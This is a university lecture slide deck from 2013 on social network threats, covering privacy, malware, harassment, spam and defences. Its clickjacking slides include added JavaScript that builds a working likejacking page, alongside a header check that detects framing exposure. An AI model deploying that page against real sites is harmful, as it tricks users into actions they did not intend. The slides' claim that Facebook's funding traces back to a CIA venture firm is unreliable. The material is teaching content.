CSCD 303 Essential Computer Security Spring 2013 Lecture 14 – Social network threats and Attacks Reading: See links - End of Slides.

1 CSCD 303 Essential Computer Security Spring 2013 Lecture 14 – Social network threats and Attacks Reading: See links - End of Slides

2 Overview Talk about the good and bad of Social Network sites …

3 Information Security is not just for companies

4 Overview
Define Social Networking and its benefits
Social Networking is an Identity Management System, but not always a very good one: it has vulnerabilities

5 Social Networking Sites: Problems of Trust
Research shows that nearly 2/3 of us don't trust online companies like Facebook
Facebook has constantly tweaked its complex security settings over the years, and despite protests and public outcry the situation does not seem to have improved
Studies show that 68% of Facebook users do not understand the social network's privacy settings
According to a 2011 report by MSNBC and the Ponemon Institute, Internet users feel they have less control over their personal information today than they did 5 years ago
http://www.jeffbullas.com/2012/02/23/is-social-media-a-serious-threat-to-your-privacy-infographic/

6 Facebook Origins
Where did Facebook come from? Who funded it?
In-Q-Tel is a venture capital company of the CIA (Central Intelligence Agency). In their own words: "As an information-based agency, the CIA must be at the cutting edge of information technology in order to maintain its competitive edge and provide its customers with intelligence that is both timely and relevant"

7 In-Q-Tel Information
The Corbett Report describes In-Q-Tel's involvement in companies that monitor people:
– The data mining equipment installed in the NSA back door at AT&T, a Narus STA 6400, was developed by a company whose partners were funded by In-Q-Tel
– News21 reported on an In-Q-Tel investment in CallMiner, a company developing technology for turning recorded telephone conversations into searchable databases
– Direct investment in Google and Facebook is shadier, but can still be traced back to In-Q-Tel (details below)
http://www.corbettreport.com/meet-in-q-tel-the-cias-venture-capital-firm-preview/

8 “Giving people the power to share and make the world more open and connected.”

9 “Twitter is a service for friends, family, and co-workers to communicate and stay connected through the exchange of quick frequent answers to one simple question: What are you doing?”

10 “Your professional network of trusted contacts gives you an advantage in your career, and is one of your most valuable assets. LinkedIn exists to help you make better use of your professional network and help the people you trust in return.”

11 “Delicious is a Social Bookmarking service, which means you can save all your bookmarks online, share them with other people, and see what other people are bookmarking.”

13 Social Networking: a Digital Cocktail Party
Define my profile (define myself online: interests, skills, etc.)
Define relations to other profiles (including some access control)
Interact with my "Friends" via IM, wall posts, blogs

14 It’s OK because only my network can see my profile data

15 Low friending thresholds (poor authentication)

16 Only my friends can see my data?
Most users don't realise the size of their audience:
– Only everyone in the London Network?
– Only everyone who pays for a LinkedIn Pro account?
– Only everyone in your email address book?
– Only social network employees?
– Only anyone who's willing to pay for behavioural advertising?
– Only plastic green frogs?

17 It’s OK because I don’t use my real name

18 Data mining tools MyFaceID application will automatically process your photos, find all faces, help you tag them and let you search for similar people.

19 Which fortunately don’t work very well

20 OSN Information Privacy
Information posted on OSNs is generally public
– Unless you set privacy settings appropriately
– "I'll be on vacation" post plus geolocation invites burglars, i.e., "Please Rob Me"
Indiscreet posts can lead to nasty consequences
Source: [14]; map from other images, public domain

21 OSN Information Privacy
Employers, insurers, college admissions officers, et al. already screen applicants using OSNs
Recent report from Novarica, a research consultancy for the finance and insurance industries: "We can now collect information on buying behaviors, geospatial and location information, social media and Internet usage, and more… Our electronic trails have been digitized, formatted, standardized, analyzed and modeled, and are up for sale. As intimidating as this may sound to the individual, it is a great opportunity for businesses to use this data."

22 OSN Information Privacy
Posts that got people fired
– Connor Riley: "Cisco just offered me a job! Now I have to weigh the utility of a [big] paycheck against the daily commute to San Jose and hating the work."
– Tania Dickinson: compared her job at a New Zealand development agency to an "expensive paperweight"
– Virgin Atlantic flight attendants who mentioned engines replaced 4 times/year, cabins with cockroaches

23 OSN Information Privacy
OSNs don't exactly safeguard posted info…
LinkedIn: "Additionally, you grant LinkedIn a nonexclusive, irrevocable, worldwide, perpetual, unlimited, assignable, sublicenseable, fully paid up and royalty-free right to us to copy, prepare derivative works of, improve, distribute, publish, remove, retain, add, process, analyze, use and commercialize, in any way now known or in the future discovered, any information you provide, directly or indirectly to LinkedIn, including but not limited to any user generated content, ideas, concepts, techniques or data to the services, you submit to LinkedIn, without any further consent, notice and/or compensation to you or to any third parties. Any information you submit to us is at your own risk of loss."
Facebook: "You hereby grant Facebook an irrevocable, perpetual, non-exclusive, transferable, fully paid, worldwide license (with the right to sublicense) to (a) use, copy, publish, stream, store, retain, publicly perform or display, transmit, scan, reformat, modify, edit, frame, translate, excerpt, adapt, create derivative works and distribute (through multiple tiers), any User Content you (i) Post on or in connection with the Facebook Service or the promotion thereof subject only to your privacy settings or (ii) enable a user to Post, including by offering a Share Link on your website and (b) to use your name, likeness and image for any purpose, including commercial or advertising, each of (a) and (b) on or in connection with the Facebook Service or the promotion thereof. You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content."

24 Facebook Privacy Policy
Facebook's own Terms of Use state: "By posting Member Content to any part of the Web site, you automatically grant, and you represent and warrant that you have the right to grant, to facebook an irrevocable, perpetual, non-exclusive, transferable, fully paid, worldwide license to use, copy, perform, display, reformat, translate, excerpt and distribute such information and content and to prepare derivative works of, or incorporate into other works, such information and content, and to grant and authorise sublicenses of the foregoing"
And in its equally interesting privacy policy: "Facebook may also collect information about you from other sources, such as newspapers, blogs, instant messaging services, and other users of the Facebook service through the operation of the service (eg. photo tags) in order to provide you with more useful information and a more personalised experience. By using Facebook, you are consenting to have your personal data transferred to and processed in the United States."

25 OSN Security Threats/Attacks Malware distribution

26 OSN Malware Distribution
Best-known example: Koobface
– Worm masquerading as an Adobe Flash Player update
– Starting in 2009, OSN users enticed to watch a "funny video", then conned into "updating" Flash
– Koobface connected infected computers to a botnet and served the machines ads for fake antivirus software
– Estimated 400,000–800,000 bots in 2010
– Facebook outed the gang behind Koobface in Jan. 2012; bot server shut down

27 OSN Security Threats/Attacks Cyber harassment, stalking, etc.

28 OSN Stalking, Harassment, etc.
Bullies, stalkers, etc. harass people via OSNs
– High-profile example: Megan Meier's suicide. 13-year-old Meier killed herself after chatting on MySpace with a 16-year-old boy who made degrading remarks. The "boy" was a fake account set up by Lori Drew, mother of Meier's ex-friend. Drew was found guilty of violating the Computer Fraud and Abuse Act in 2008; acquitted in 2009
– Most U.S. states have since criminalized cyber harassment, stalking, etc.
– OSNs (and their members) have played similar roles in mistreating people

29 OSN Threats Then, there is Social Networking Spam...

30 Social networking spam

33 Social networking spam in 2011
57% of social networking users report being hit by spam via the services
That's an increase of 70.6% from a year ago

34 OSN Malware Distribution
Other third-party apps on OSNs like Facebook may contain malware if not vetted, which they typically are not

35 OSN Third Party Applications
Games, quizzes, "cute" stuff
Untested by Facebook: anyone can write one…
No Terms and Conditions: either allow or deny
Installation gives developers rights to look at your profile and overrides your privacy settings!
"There's a sucker born every minute." –P.T. Barnum

36 OSN Threats Shelf-life of your on-line Information is FOREVER!!!

37 OSN Information "Shelf Life"
Common sense: it's very difficult to delete information after it's been posted online
Indiscreet information can adversely affect college admissions, employment, insurance
Twitter gave its entire archive to the Library of Congress in 2010

38 Click-Jacking and Like-Jacking
What is Clickjacking?
– Clickjacking occurs when a scam artist or other Internet-based bad guy places an invisible button or other user interface element (typically another site's real button, loaded in a fully transparent frame) on top of a seemingly innocent web page button or interface element. Because the overlay is transparent you can't see it, but it is what receives your click.

39 Click-Jacking and Like-Jacking
The innocent web page might have a button which reads "Click here to see a video of a fluffy kitty being cute and adorable", but hidden on top of that button is an invisible button that actually does something you would not otherwise want to click on, such as a button that:
– Tricks you into changing privacy settings on your Facebook account
– Tricks you into "liking" something you wouldn't normally like
– Tricks you into adding yourself as a Twitter follower of someone who doesn't deserve you
– Tricks you into enabling something on your computer (such as a microphone or camera)

40 Click-Jacking and Like-Jacking
What is Like-Jacking?
– "Likejacking" is a Facebook-specific version of an attack called "clickjacking."
– The purpose of the attack is to get you to click items on a webpage without your knowledge.
– Facebook attackers present a web page that actually has two layers. One layer is an invisible Facebook "Like" button configured to follow your mouse cursor; the other layer shows whatever lure you are meant to click on.
– No matter where you click on the web page, you are actually clicking the Facebook Like button and further spreading the spam
http://www.sophos.com/en-us/security-news-trends/security-trends/what-is-likejacking.aspx
A short video about this: http://www.webpronews.com/likejacking-scams-on-facebook-2012-04
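The mechanics on the three slides above, as an added example that is not part of the lecture material: first a generator for the kind of page an attacker serves (a transparent iframe holding the target site's real button, re-centred under the cursor on every mouse move, so any click on the lure lands on the hidden button), then the check a site owner can run against its own response headers to see whether a browser would let the page be framed at all. The target URL and the origins used below are placeholders, and the header check is deliberately simplified: a CSP frame-ancestors directive takes precedence over X-Frame-Options, and only the sources 'none', 'self', * and literal origins are recognised (no host wildcards or scheme-only sources).

```javascript
// Added example, not from the lecture slides. Builds the attacker's
// likejacking page and checks whether a target page's response headers
// would stop a browser from framing it. All URLs/origins are placeholders.

// Attacker side: the visible lure sits in normal flow; a transparent
// iframe containing the target's real button is absolutely positioned on
// top (z-index) and inline script keeps it centred under the cursor, so
// wherever the victim clicks, the click reaches the hidden button.
function buildLikejackPage(targetButtonUrl, lureText) {
  return [
    '<!doctype html>',
    '<html><body>',
    '<button id="lure">' + lureText + '</button>',
    '<iframe id="hidden" src="' + targetButtonUrl + '" scrolling="no"',
    '  style="position:absolute;opacity:0;width:90px;height:25px;z-index:10;border:0"></iframe>',
    '<script>',
    '  var f = document.getElementById("hidden");',
    '  document.addEventListener("mousemove", function (e) {',
    '    f.style.left = (e.pageX - 45) + "px"; // keep the 90x25 button centred on the pointer',
    '    f.style.top  = (e.pageY - 12) + "px";',
    '  });',
    '</script>',
    '</body></html>'
  ].join('\n');
}

// Defender side: would a current browser render the target page inside a
// frame on attackerOrigin? Simplified browser rules: a CSP frame-ancestors
// directive, if present, is authoritative and X-Frame-Options is ignored;
// otherwise X-Frame-Options DENY/SAMEORIGIN applies; the obsolete
// ALLOW-FROM form and unrecognised values give no protection.
function framingAllowed(headers, pageOrigin, attackerOrigin) {
  const header = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key === undefined ? undefined : headers[key];
  };
  const csp = header('content-security-policy');
  if (csp) {
    const directive = csp.split(';')
      .map((d) => d.trim().split(/\s+/))
      .find((parts) => parts[0].toLowerCase() === 'frame-ancestors');
    if (directive) {
      const sources = directive.slice(1).map((s) => s.toLowerCase());
      if (sources.includes("'none'")) return false;
      if (sources.includes('*')) return true;
      if (sources.includes("'self'") && pageOrigin === attackerOrigin) return true;
      return sources.includes(attackerOrigin.toLowerCase());
    }
  }
  const xfo = header('x-frame-options');
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === 'DENY') return false;
    if (value === 'SAMEORIGIN') return pageOrigin === attackerOrigin;
  }
  return true; // nothing effective forbids framing: the page can be clickjacked
}

// Usage with placeholder origins: a page that sends no anti-framing header
// at all is frameable, so the likejack page above would work against it.
const attackerHtml = buildLikejackPage('https://social.example/like?page=spam',
                                       'Click here to see the funny video!');
const exposed = framingAllowed({ 'Content-Type': 'text/html' },
                               'https://social.example', 'https://evil.example');
console.log(exposed ? 'frameable: likejack page would work' : 'protected');
console.log(attackerHtml.length + ' bytes of attacker page generated');
```

Only the framed site can close this hole: the victim's browser sees a legitimate button receiving a legitimate click, so the fix is frame-ancestors 'none' (or X-Frame-Options: DENY where CSP is not available) on the page that hosts the button, plus the OSN's own anti-abuse logic on the resulting Likes.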

41 Defense Measures

42 Personal Defense Measures
Common sense measures
– Use strong, unique passwords
– Provide minimal personal information: avoid entering birthdate, address, etc.
– Review privacy settings, set them to "maximum privacy" ("Friends of friends" includes far more people than "friends only")
– Exercise discretion about posted material: pictures, videos, etc.; opinions on controversial issues; anything involving coworkers, bosses, classmates, professors; anything related to your employer (unless authorized to do so)
– Be wary of third-party apps and ads

43 Personal Defense Measures
More advice...
– "If it sounds too good to be true, it probably is"
– Use browser security tools for protection: anti-phishing filters (IE, Firefox); AdBlock/NoScript/Do Not Track Plus
– Personal reputation management: search for yourself online, look at the results…
– Extreme cases: cease using OSNs, delete accounts; contact law enforcement re. relentless online harassment

45 Summary
Experts suggest:
– The Internet security model is completely flawed
– Made worse by Web 2.0
– Human nature and trust in our friends and connections will always leave us vulnerable
– Try not to put anything too personal or incriminating on Social Networking sites
– Or, don't use them at all!!!!

46 References
1. J. Drömer and D. Kollberg, "The Koobface malware gang – exposed!", 2012, http://nakedsecurity.sophos.com/koobface/
2. Wikipedia, https://en.wikipedia.org/wiki/Suicide_of_Megan_Meier
3. M. Schwartz, "The Trolls Among Us," 3 Aug. 2008, https://www.nytimes.com/2008/08/03/magazine/03trolls-t.html?pagewanted=all
4. M. Raymond, "How Tweet It Is!: Library Acquires Entire Twitter Archive," 14 Apr. 2010, http://blogs.loc.gov/loc/2010/04/how-tweet-it-is-library-acquires-entire-twitter-archive/
5. B. Borsboom, B. van Amstel, and F. Groeneveld, "Please Rob Me", http://pleaserobme.com
6. D. Love, "13 People Who Got Fired for Tweeting," 16 May 2011, http://www.businessinsider.com/twitter-fired-2011-5?op=1
7. C. Smith and C. Kanalley, "Fired Over Facebook: 13 Posts That Got People Canned," http://www.huffingtonpost.com/2010/07/26/fired-over-facebook-posts_n_659170.html
8. https://twitter.com/BPglobalPR
9. http://curl.haxx.se/
10. http://jonathonhill.net/2012-05-18/unshorten-urls-with-php-and-curl/
11. http://www.securingsocialmedia.com/resources/

47 More References
Sophos Report on Social Networking Threats
– http://www.sophos.com/en-us/security-news-trends/security-trends/social-networking-security-threats/facebook.aspx

48 End Midterm and Assignment due today

